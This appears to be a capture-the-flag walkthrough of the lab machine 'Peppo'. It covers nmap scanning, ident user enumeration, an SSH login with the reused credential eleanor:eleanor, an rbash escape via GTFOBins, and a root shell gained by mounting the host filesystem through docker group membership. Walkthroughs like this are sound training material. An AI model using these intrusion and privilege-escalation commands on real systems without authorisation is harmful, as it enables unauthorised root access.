# Peppo

<figure><img src="/files/5dN9mT65RPg2ZDgh5m1z" alt=""><figcaption></figcaption></figure>

### Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

Since `ident` (port 113) is open, we can use the Perl script `ident-user-enum` to ask the ident daemon which local user owns each of the listening services.

<figure><img src="/files/6l7cfTAPJIr0No17fKMM" alt=""><figcaption></figcaption></figure>

Port 10000 reports that it is running as the user `eleanor`. Brute-forcing a password for that username over SSH got nowhere, but the username reused as the password, `eleanor:eleanor`, logs us in over SSH.

<figure><img src="/files/1KM0olbJZlxsC4UvofYM" alt=""><figcaption></figcaption></figure>

Trying to run `id` reveals that we are locked into a restricted bash shell (rbash). We can check what is available to us by listing the binaries we are permitted to run.

<figure><img src="/files/a3vyGGDcs6zA8cxHDMOR" alt=""><figcaption></figcaption></figure>

Checking GTFOBins for each of these binaries turns up one that can spawn a shell and so escape the restricted one:

<figure><img src="/files/A3R6lhIziB2BxHBHa4YB" alt=""><figcaption></figcaption></figure>

After running the escape we set a proper PATH (rbash itself forbids changing PATH, which is why this has to happen in the newly spawned shell), upgrade to an interactive bash through Python's `pty` module, and set the PATH once more in that shell so that the full set of system binaries is available.

```
# Run inside the unrestricted shell spawned via GTFOBins; rbash would refuse this.
export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
# Upgrade to an interactive bash with a pty.
python -c 'import pty; pty.spawn("/bin/bash")'
# bash's startup files may reset PATH, so set it once more in the new shell.
export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

<figure><img src="/files/DQVAXcGe6Gr55z8cuzq3" alt=""><figcaption></figcaption></figure>

`id` now shows that we are a member of the `docker` group. Membership in that group grants access to the Docker socket, which is effectively root on the host: any container we start runs as root and can bind-mount the host filesystem. GTFOBins lists a method for spawning a root shell from exactly this position.

<figure><img src="/files/jiWcMkmsEXZ5S0NVTBxy" alt=""><figcaption></figcaption></figure>

First, check what images we have available to us:

```
docker image ls
```

We use the GTFOBins command, replacing the placeholder image `<alpine>` with one of the images listed above, here `redmine`:

```
# -v /:/mnt bind-mounts the host's root filesystem into the container;
# chroot into it as the container's root user gives a root shell on the host.
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

Returning a shell as root:

<figure><img src="/files/cWbsZIvT2AaA8vLC9dUm" alt=""><figcaption></figcaption></figure>
